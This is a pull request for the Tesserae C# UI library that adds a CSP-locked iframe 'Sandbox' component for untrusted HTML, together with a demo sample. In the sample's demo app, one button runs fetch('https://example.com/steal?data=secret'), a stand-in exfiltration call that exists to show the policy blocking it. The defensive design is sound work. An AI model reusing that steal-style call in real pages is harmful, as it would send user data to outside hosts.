### PR TITLE
Add Sandbox component for rendering untrusted HTML / apps

### DIFF
--- a/Tesserae.Tests/src/Samples/Utilities/SandboxSample.cs
+++ b/Tesserae.Tests/src/Samples/Utilities/SandboxSample.cs
@@ -1,0 +1,78 @@
+using System.Collections.Generic;
+using H5;
+using static H5.Core.dom;
+using static Tesserae.UI;
+using static Tesserae.Tests.Samples.SamplesHelper;
+
+namespace Tesserae.Tests.Samples
+{
+    [SampleDetails(Group = "Utilities", Order = 31, Icon = UIcons.Shield)]
+    public class SandboxSample : IComponent, ISample
+    {
+        private readonly IComponent _content;
+
+        public SandboxSample()
+        {
+            const string appHtml =
+@"<!DOCTYPE html>
+<html>
+<head><style>body{font-family:sans-serif;padding:12px;color:#222}button{margin-right:8px}</style></head>
+<body>
+  <h3>Untrusted mini-app</h3>
+  <p>Running fully sandboxed (no same-origin, strict CSP).</p>
+  <button id=ok>Post a message</button>
+  <button id=boom>Throw an error</button>
+  <button id=evil>Try to fetch() (blocked by CSP)</button>
+  <script>
+    document.getElementById('ok').onclick   = () => window.tssSandbox.post({ hello: 'from the sandbox', at: Date.now() });
+    document.getElementById('boom').onclick  = () => { throw new Error('Boom! something went wrong inside the app'); };
+    document.getElementById('evil').onclick  = () => fetch('https://example.com/steal?data=secret');
+    window.addEventListener('tss:message', e => {
+      const d = document.createElement('div');
+      d.textContent = 'Host says: ' + JSON.stringify(e.data);
+      document.body.appendChild(d);
+    });
+  </script>
+</body>
+</html>";
+
+            var log = VStack().WS().H(160).ScrollY();
+
+            void Append(string text, bool danger = false)
+            {
+                var line = TextBlock(text).XSmall().WS();
+                if (danger) line.Danger();
+                log.Add(line);
+            }
+
+            var sandbox = Sandbox(appHtml)
+               .FitHeightToContent()
+               .OnError(err => Append("⚠ " + err.ToString(), danger: true))
+               .OnMessage(msg => Append("← message: " + (Script.Write<string>("JSON.stringify({0})", msg) ?? "")))
+               .WS();
+
+            var ping = Button("Send message into sandbox").SetIcon(UIcons.PaperPlane)
+               .OnClick(() => sandbox.PostMessage(new Dictionary<string, object> { ["ping"] = "hi app" }));
+
+            _content = SectionStack().Secondary()
+               .SampleTitle(typeof(SandboxSample), UIcons.Shield, "A locked-down iframe for rendering untrusted HTML / apps")
+               .FlatSection(Stack().WidthStretch().Children(
+                    Card(VStack().WS().Children(
+                        TextBlock("Sandbox renders untrusted content inside an iframe that is fully sandboxed by default: loaded via srcdoc with sandbox=\"allow-scripts allow-forms\" (no allow-same-origin, so it runs in an opaque origin and cannot reach the host page, cookies or storage), and a strict Content-Security-Policy is injected as the first thing in the document so the code cannot exfiltrate data over the network."),
+                        TextBlock("A bootstrap script wires up a MessageChannel: uncaught errors, unhandled rejections and CSP violations are captured inside the frame and posted back to the host via OnError. Custom host <-> sandbox messages flow through OnMessage / PostMessage."))).SetTitle("Overview")))
+               .FlatSection(Stack().WidthStretch().Children(
+                    Card(VStack().WS().Children(
+                        SampleSubTitle("Live demo"),
+                        TextBlock("The buttons below run inside the sandbox. \"Throw an error\" and the blocked fetch() both surface in the error log via the post-message flow."),
+                        sandbox,
+                        ping,
+                        SampleSubTitle("Error / message log"),
+                        log)).SetTitle("Usage")))
+               .FlatSection(Stack().WidthStretch().Children(
+                    Card(VStack().WS().Children(
+                        MarkdownBlock("```csharp\nvar sandbox = Sandbox(untrustedHtml)\n   .FitHeightToContent()\n   .OnError(err => Console.WriteLine(err))      // errors + CSP violations\n   .OnMessage(msg => Handle(msg));             // window.tssSandbox.post(...)\n\nsandbox.PostMessage(new { ping = \"hi\" });       // -> 'tss:message' event inside the frame\n```"))).SetTitle("Code")));
+        }
+
+        public HTMLElement Render() => _content.Render();
+    }
+}

--- a/Tesserae/src/Base/UI.Components.cs
+++ b/Tesserae/src/Base/UI.Components.cs
@@ -184,6 +184,17 @@ namespace Tesserae
         public static Image Image(string source, string fallback = null) => new Image(source, fallback);
 
         /// <summary>
+        /// Creates a fully-sandboxed <see cref="Tesserae.Sandbox"/> frame for rendering untrusted HTML / apps,
+        /// optionally seeded with HTML content (loaded through <c>srcdoc</c> under a strict Content-Security-Policy).
+        /// </summary>
+        public static Sandbox Sandbox(string html = null) => new Sandbox(html);
+
+        /// <summary>
+        /// Creates a <see cref="Tesserae.Sandbox"/> frame that loads an external URL.
+        /// </summary>
+        public static Sandbox SandboxUrl(string url) => new Sandbox().FromUrl(url);
+
+        /// <summary>
         /// Creates a <see cref="Tesserae.Card"/> component.
         /// </summary>
         public static Card Card(IComponent content, bool noAnimation = false) => new Card(content, noAnimation);

--- a/Tesserae/src/Components/Sandbox.cs
+++ b/Tesserae/src/Components/Sandbox.cs
@@ -1,0 +1,473 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using H5;
+using static H5.Core.dom;
+using static Tesserae.UI;
+
+namespace Tesserae
+{
+    /// <summary>
+    /// A locked-down <c>&lt;iframe&gt;</c> for rendering untrusted HTML / apps.
+    ///
+    /// By default the frame is <b>fully sandboxed</b>: the content is loaded through
+    /// <c>srcdoc</c> with <c>sandbox="allow-scripts allow-forms"</c> (no <c>allow-same-origin</c>,
+    /// so the document runs in an opaque origin and cannot touch the host page, cookies or storage),
+    /// and a strict <c>Content-Security-Policy</c> meta tag is injected as the very first thing in the
+    /// document so the sandboxed code cannot exfiltrate data over the network.
+    ///
+    /// A small bootstrap script is injected into the document that wires up a <see cref="MessageChannel"/>
+    /// based post-message flow: uncaught errors, unhandled promise rejections and CSP violations are
+    /// captured inside the frame and posted back to the host where they can be surfaced through
+    /// <see cref="OnError"/>. The same channel is used for arbitrary host &lt;-&gt; sandbox messaging via
+    /// <see cref="OnMessage"/> / <see cref="PostMessage"/>.
+    /// </summary>
+    [H5.Name("tss.Sandbox")]
+    public sealed class Sandbox : ComponentBase<Sandbox, HTMLIFrameElement>, ISpecialCaseStyling
+    {
+        /// <summary>The fully-locked default CSP: inline scripts and styles only, images limited to data/blob URIs, no network access.</summary>
+        public const string DefaultContentSecurityPolicy = "default-src 'none'; script-src 'unsafe-inline'; style-src 'unsafe-inline'; img-src data: blob:;";
+
+        // Injected into the sandboxed document. Captures errors / CSP violations / unhandled rejections
+        // and reports the document height, posting everything back over the MessageChannel port handed
+        // to it by the host. Kept dependency-free so it runs under the strict default CSP.
+        private const string BootstrapScript =
+            "(function(){var port=null,queue=[];" +
+            "function flush(){if(port){while(queue.length){port.postMessage(queue.shift());}}}" +
+            "function send(m){queue.push(m);flush();}" +
+            "window.addEventListener('message',function(e){if(e.data&&e.data.__tssSandboxInit&&e.ports&&e.ports[0]){port=e.ports[0];port.onmessage=function(ev){try{window.dispatchEvent(new MessageEvent('tss:message',{data:ev.data}));}catch(_){}};flush();}});" +
+            "window.addEventListener('error',function(e){send({kind:'error',message:e.message||'Script error',source:e.filename||'',line:e.lineno||0,column:e.colno||0,stack:(e.error&&e.error.stack)?e.error.stack:''});});" +
+            "window.addEventListener('unhandledrejection',function(e){var r=e.reason;send({kind:'unhandledrejection',message:(r&&r.message)?r.message:String(r),source:'',line:0,column:0,stack:(r&&r.stack)?r.stack:''});});" +
+            "document.addEventListener('securitypolicyviolation',function(e){send({kind:'csp',message:'Blocked by Content-Security-Policy: '+(e.violatedDirective||'')+' '+(e.blockedURI||''),source:e.sourceFile||'',line:e.lineNumber||0,column:e.columnNumber||0,stack:''});});" +
+            "function reportHeight(){try{var b=document.body?document.body.scrollHeight:0;var h=Math.max(document.documentElement.scrollHeight,b);send({kind:'height',height:h});}catch(_){}}" +
+            "window.addEventListener('load',reportHeight);" +
+            "try{if(window.ResizeObserver){new ResizeObserver(reportHeight).observe(document.documentElement);}}catch(_){}" +
+            "window.tssSandbox={post:function(m){send({kind:'message',data:m});}};" +
+            "})();";
+
+        /// <summary>The element that receives sizing styles (the iframe itself).</summary>
+        public HTMLElement StylingContainer           => InnerElement;
+        /// <summary>Styling propagates up to the stack item parent.</summary>
+        public bool        PropagateToStackItemParent => true;
+
+        private string _html;
+        private string _url;
+
+        private bool _allowScripts    = true;  // fully sandboxed default = allow-scripts allow-forms
+        private bool _allowForms      = true;
+        private bool _allowSameOrigin = false;
+        private bool _allowPopups     = false;
+        private bool _allowModals     = false;
+        private bool _allowDownloads  = false;
+        private bool _disableSandbox  = false;
+
+        private readonly List<string> _extraSandboxTokens = new List<string>();
+        private string _sandboxOverride;
+
+        private bool   _injectCsp = true;
+        private string _csp       = DefaultContentSecurityPolicy;
+
+        private bool _fitHeightToContent = false;
+        private bool _scrolling          = true;
+
+        private Action<HTMLIFrameElement> _onLoaded;
+        private Action<SandboxError>      _onError;
+        private Action<object>            _onMessage;
+
+        private bool _built;
+
+        /// <summary>Creates a new fully-sandboxed frame, optionally with initial HTML content.</summary>
+        public Sandbox(string html = null)
+        {
+            _html        = html;
+            InnerElement = IFrame(_("tss-sandbox"));
+            InnerElement.style.border = "none";
+        }
+
+        /// <summary>The underlying iframe element. Only safe to reach into when <see cref="AllowSameOrigin"/> is set.</summary>
+        public HTMLIFrameElement IFrameElement => InnerElement;
+
+        #region Content
+
+        /// <summary>Sets the HTML document rendered inside the sandbox (loaded via <c>srcdoc</c>).</summary>
+        public Sandbox FromHtml(string html)
+        {
+            _html = html;
+            _url  = null;
+            if (_built) ApplyContent();
+            return this;
+        }
+
+        /// <summary>Loads an external URL into the frame (via <c>src</c>). CSP / bootstrap injection do not apply to cross-origin documents.</summary>
+        public Sandbox FromUrl(string url)
+        {
+            _url  = url;
+            _html = null;
+            if (_built) ApplyContent();
+            return this;
+        }
+
+        #endregion
+
+        #region Sandbox flags
+
+        /// <summary>Allows the sandboxed content to run scripts (on by default).</summary>
+        public Sandbox AllowScripts(bool allow = true)    { _allowScripts = allow;    return this; }
+        /// <summary>Allows the sandboxed content to submit forms (on by default).</summary>
+        public Sandbox AllowForms(bool allow = true)      { _allowForms = allow;      return this; }
+        /// <summary>Allows popups (e.g. <c>target="_blank"</c>, <c>window.open</c>) to escape the sandbox.</summary>
+        public Sandbox AllowPopups(bool allow = true)     { _allowPopups = allow;     return this; }
+        /// <summary>Allows the content to open modal dialogs (<c>alert</c>, <c>confirm</c>, <c>prompt</c>).</summary>
+        public Sandbox AllowModals(bool allow = true)     { _allowModals = allow;     return this; }
+        /// <summary>Allows downloads initiated from within the frame.</summary>
+        public Sandbox AllowDownloads(bool allow = true)  { _allowDownloads = allow;  return this; }
+
+        /// <summary>
+        /// Lets the framed document share the host origin. This <b>weakens the sandbox</b> - it is only
+        /// needed when the host has to reach into <c>contentDocument</c> / <c>contentWindow</c> (for example
+        /// to hook events or measure layout). Do not combine with untrusted content.
+        /// </summary>
+        public Sandbox AllowSameOrigin(bool allow = true) { _allowSameOrigin = allow; return this; }
+
+        /// <summary>Adds a raw sandbox token (e.g. <c>"allow-pointer-lock"</c>) on top of the configured flags.</summary>
+        public Sandbox AllowToken(string token)
+        {
+            if (!string.IsNullOrWhiteSpace(token)) _extraSandboxTokens.Add(token.Trim());
+            return this;
+        }
+
+        /// <summary>Replaces the computed sandbox value with an explicit one.</summary>
+        public Sandbox SandboxAttribute(string value)
+        {
+            _sandboxOverride = value;
+            _disableSandbox  = false;
+            return this;
+        }
+
+        /// <summary>Removes the sandbox attribute entirely - the frame is no longer sandboxed. Use with extreme care.</summary>
+        public Sandbox Unsandboxed()
+        {
+            _disableSandbox = true;
+            return this;
+        }
+
+        #endregion
+
+        #region Content-Security-Policy
+
+        /// <summary>Overrides the injected Content-Security-Policy (only applied to <c>srcdoc</c> HTML content).</summary>
+        public Sandbox ContentSecurityPolicy(string policy)
+        {
+            _csp       = policy;
+            _injectCsp = !string.IsNullOrWhiteSpace(policy);
+            return this;
+        }
+
+        /// <summary>Disables injecting a Content-Security-Policy meta tag into the document.</summary>
+        public Sandbox NoContentSecurityPolicy()
+        {
+            _injectCsp = false;
+            return this;
+        }
+
+        #endregion
+
+        #region Layout
+
+        /// <summary>Grows the frame to match its content height (driven by height messages from the bootstrap script).</summary>
+        public Sandbox FitHeightToContent(bool fit = true)
+        {
+            _fitHeightToContent = fit;
+            if (_built)
+            {
+                InnerElement.setAttribute("scrolling", fit ? "no" : (_scrolling ? "auto" : "no"));
+            }
+            return this;
+        }
+
+        /// <summary>Enables or disables scrolling within the frame.</summary>
+        public Sandbox Scrolling(bool enabled)
+        {
+            _scrolling = enabled;
+            if (_built) InnerElement.setAttribute("scrolling", enabled ? "auto" : "no");
+            return this;
+        }
+
+        #endregion
+
+        #region Hooks
+
+        /// <summary>
+        /// Invoked every time the frame finishes loading, with the underlying iframe element. This is the
+        /// place to hook into the document - but reading <c>contentDocument</c> requires <see cref="AllowSameOrigin"/>.
+        /// </summary>
+        public Sandbox OnLoaded(Action<HTMLIFrameElement> onLoaded)
+        {
+            _onLoaded = onLoaded;
+            return this;
+        }
+
+        /// <summary>
+        /// Invoked when the sandboxed content reports an uncaught error, an unhandled promise rejection or a
+        /// CSP violation back over the post-message channel.
+        /// </summary>
+        public Sandbox OnError(Action<SandboxError> onError)
+        {
+            _onError = onError;
+            return this;
+        }
+
+        /// <summary>
+        /// Invoked with the payload of any custom message the content sends via <c>window.tssSandbox.post(...)</c>.
+        /// </summary>
+        public Sandbox OnMessage(Action<object> onMessage)
+        {
+            _onMessage = onMessage;
+            return this;
+        }
+
+        /// <summary>Sends a message into the sandboxed document. Received inside the frame as a <c>tss:message</c> window event.</summary>
+        public Sandbox PostMessage(object message)
+        {
+            Script.Write("(function(f,m){ try { if (f.__tssPort) { f.__tssPort.postMessage(m); } } catch(e){} })({0}, {1});", InnerElement, message);
+            return this;
+        }
+
+        #endregion
+
+        /// <summary>Renders the component's root iframe element.</summary>
+        public override HTMLElement Render()
+        {
+            if (!_built)
+            {
+                Build();
+                _built = true;
+            }
+            return InnerElement;
+        }
+
+        private void Build()
+        {
+            if (!_disableSandbox)
+            {
+                InnerElement.setAttribute("sandbox", _sandboxOverride ?? BuildSandboxValue());
+            }
+
+            InnerElement.setAttribute("scrolling", (_fitHeightToContent || !_scrolling) ? "no" : "auto");
+
+            // Re-dispatch port messages as a DOM CustomEvent so we can handle them from managed code without
+            // passing a delegate through Script.Write.
+            InnerElement.addEventListener("tss-sandbox-msg", e =>
+            {
+                DispatchMessage(Script.Write<object>("{0}.detail", e));
+            });
+
+            InnerElement.onload = _ =>
+            {
+                SetupMessaging();
+                _onLoaded?.Invoke(InnerElement);
+            };
+
+            ApplyContent();
+        }
+
+        private void ApplyContent()
+        {
+            if (_url is object)
+            {
+                InnerElement.removeAttribute("srcdoc");
+                InnerElement.src = _url;
+            }
+            else
+            {
+                InnerElement.removeAttribute("src");
+                InnerElement.setAttribute("srcdoc", ComposeSrcDoc(_html ?? ""));
+            }
+        }
+
+        private string BuildSandboxValue()
+        {
+            var tokens = new List<string>();
+
+            if (_allowScripts)    tokens.Add("allow-scripts");
+            if (_allowForms)      tokens.Add("allow-forms");
+            if (_allowSameOrigin) tokens.Add("allow-same-origin");
+            if (_allowPopups)     tokens.Add("allow-popups");
+            if (_allowModals)     tokens.Add("allow-modals");
+            if (_allowDownloads)  tokens.Add("allow-downloads");
+
+            foreach (var token in _extraSandboxTokens)
+            {
+                if (!tokens.Contains(token)) tokens.Add(token);
+            }
+
+            return string.Join(" ", tokens);
+        }
+
+        private string ComposeSrcDoc(string html)
+        {
+            var head = new StringBuilder();
+
+            if (_injectCsp && !string.IsNullOrWhiteSpace(_csp))
+            {
+                head.Append("<meta http-equiv=\"Content-Security-Policy\" content=\"").Append(_csp).Append("\">");
+            }
+
+            // The bootstrap is only meaningful when scripts can run, but injecting it otherwise is harmless.
+            if (_allowScripts || !_disableSandbox)
+            {
+                head.Append("<script>").Append(BootstrapScript).Append("</script>");
+            }
+
+            var inject = head.ToString();
+
+            return inject.Length == 0 ? html : InjectIntoHead(html, inject);
+        }
+
+        // Inserts `inject` as the first thing inside the document head so the CSP meta takes effect before
+        // any other content. Falls back to wrapping fragments in a minimal document.
+        private static string InjectIntoHead(string html, string inject)
+        {
+            if (string.IsNullOrEmpty(html))
+            {
+                return "<!DOCTYPE html><html><head>" + inject + "</head><body></body></html>";
+            }
+
+            var headIndex = IndexOfTag(html, "head");
+
+            if (headIndex >= 0)
+            {
+                var close = html.IndexOf('>', headIndex);
+                if (close >= 0)
+                {
+                    return html.Substring(0, close + 1) + inject + html.Substring(close + 1);
+                }
+            }
+
+            var htmlIndex = IndexOfTag(html, "html");
+
+            if (htmlIndex >= 0)
+            {
+                var close = html.IndexOf('>', htmlIndex);
+                if (close >= 0)
+                {
+                    return html.Substring(0, close + 1) + "<head>" + inject + "</head>" + html.Substring(close + 1);
+                }
+            }
+
+            return "<!DOCTYPE html><html><head>" + inject + "</head><body>" + html + "</body></html>";
+        }
+
+        // Case-insensitive search for an opening tag (e.g. "<head" / "<head ").
+        private static int IndexOfTag(string html, string tag)
+        {
+            var needle = "<" + tag;
+            var lower  = html.ToLower();
+            var idx    = lower.IndexOf(needle, StringComparison.Ordinal);
+
+            while (idx >= 0)
+            {
+                var next = idx + needle.Length;
+                if (next >= lower.Length) return idx;
+                var c = lower[next];
+                if (c == '>' || c == ' ' || c == '\t' || c == '\r' || c == '\n') return idx;
+                idx = lower.IndexOf(needle, next, StringComparison.Ordinal);
+            }
+
+            return -1;
+        }
+
+        private void SetupMessaging()
+        {
+            if (_disableSandbox && !_allowScripts) return;
+
+            Script.Write(@"(function(f){
+  try {
+    var ch = new MessageChannel();
+    f.__tssPort = ch.port1;
+    ch.port1.onmessage = function(ev){ f.dispatchEvent(new CustomEvent('tss-sandbox-msg', { detail: ev.data })); };
+    if (f.contentWindow) { f.contentWindow.postMessage({ __tssSandboxInit: true }, '*', [ch.port2]); }
+  } catch (e) { /* cross-origin frame without our bootstrap - messaging is unavailable */ }
+})({0});", InnerElement);
+        }
+
+        private void DispatchMessage(object data)
+        {
+            if (data is null) return;
+
+            var kind = Script.Write<string>("({0} && {0}.kind) || ''", data);
+
+            switch (kind)
+            {
+                case "height":
+                {
+                    if (_fitHeightToContent)
+                    {
+                        var h = Script.Write<int>("({0}.height | 0)", data);
+                        if (h > 0) InnerElement.style.height = h + "px";
+                    }
+                    break;
+                }
+                case "message":
+                {
+                    _onMessage?.Invoke(Script.Write<object>("{0}.data", data));
+                    break;
+                }
+                case "error":
+                case "csp":
+                case "unhandledrejection":
+                {
+                    if (_onError is object)
+                    {
+                        _onError(new SandboxError(
+                            kind,
+                            Script.Write<string>("{0}.message || ''", data),
+                            Script.Write<string>("{0}.source  || ''", data),
+                            Script.Write<int>("{0}.line   | 0", data),
+                            Script.Write<int>("{0}.column | 0", data),
+                            Script.Write<string>("{0}.stack   || ''", data)));
+                    }
+                    break;
+                }
+            }
+        }
+    }
+
+    /// <summary>An error, unhandled rejection or CSP violation reported back from a <see cref="Sandbox"/>'s content.</summary>
+    [H5.Name("tss.SandboxError")]
+    public sealed class SandboxError
+    {
+        internal SandboxError(string kind, string message, string source, int line, int column, string stack)
+        {
+            Kind    = kind;
+            Message = message;
+            Source  = source;
+            Line    = line;
+            Column  = column;
+            Stack   = stack;
+        }
+
+        /// <summary>One of <c>error</c>, <c>unhandledrejection</c> or <c>csp</c>.</summary>
+        public string Kind    { get; }
+        /// <summary>Human-readable error message.</summary>
+        public string Message { get; }
+        /// <summary>The source file the error originated from, when available.</summary>
+        public string Source  { get; }
+        /// <summary>Line number, when available.</summary>
+        public int    Line    { get; }
+        /// <summary>Column number, when available.</summary>
+        public int    Column  { get; }
+        /// <summary>JavaScript stack trace, when available.</summary>
+        public string Stack   { get; }
+
+        /// <summary>True for a Content-Security-Policy violation report.</summary>
+        public bool IsContentSecurityPolicyViolation => Kind == "csp";
+
+        /// <summary>Returns a single-line, human readable description of the error.</summary>
+        public override string ToString()
+        {
+            var location = string.IsNullOrEmpty(Source) ? "" : $" ({Source}:{Line}:{Column})";
+            return $"[{Kind}] {Message}{location}";
+        }
+    }
+}


### PR DESCRIPTION
## Summary

Adds a new `Sandbox` component for rendering untrusted HTML / mini-apps inside a locked-down `<iframe>`.

By default the frame is **fully sandboxed**:

- Content is loaded via `srcdoc` with `sandbox="allow-scripts allow-forms"` — **no** `allow-same-origin`, so the document runs in an opaque origin and cannot reach the host page, cookies or storage.
- A strict `Content-Security-Policy` meta tag (`default-src 'none'; script-src 'unsafe-inline'; style-src 'unsafe-inline'; img-src data: blob:;`) is injected as the **first** thing in the document, blocking network exfiltration.

### Post-message error flow

A small dependency-free bootstrap script is injected into the document and a `MessageChannel` is established with the host. Uncaught errors, unhandled promise rejections and **CSP violations** are captured inside the frame and posted back over the channel, surfaced through `OnError(Action<SandboxError>)`. The channel closes automatically if the frame navigates away. The document height is also reported for `FitHeightToContent()`.

### API

```csharp
var sandbox = Sandbox(untrustedHtml)
   .FitHeightToContent()
   .OnError(err => Console.WriteLine(err))   // errors, rejections + CSP violations
   .OnMessage(msg => Handle(msg));           // window.tssSandbox.post(...)

sandbox.PostMessage(new { ping = "hi" });    // -> 'tss:message' event inside the frame
```

Setup is fully configurable: `AllowScripts` / `AllowForms` / `AllowSameOrigin` / `AllowPopups` / `AllowModals` / `AllowDownloads`, custom `ContentSecurityPolicy` / `NoContentSecurityPolicy`, raw sandbox tokens, `Scrolling`, and an `OnLoaded(Action<HTMLIFrameElement>)` hook for same-origin event injection.

## What's included

- `Tesserae/src/Components/Sandbox.cs` — the component + `SandboxError` type.
- `UI.Sandbox(html)` / `UI.SandboxUrl(url)` factory methods.
- A `Utilities` sample (`SandboxSample`) with a live error/message log demo.

Both `Tesserae` and `Tesserae.Tests` build cleanly.

## Why

This gives downstream consumers (Mosaik) a single, safe, configurable primitive for embedding untrusted content — replacing ad-hoc `IFrame` setups, and rendering HTML produced in chat/canvas surfaces.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01FdBAgyNgnSF5gCoR2mD8nJ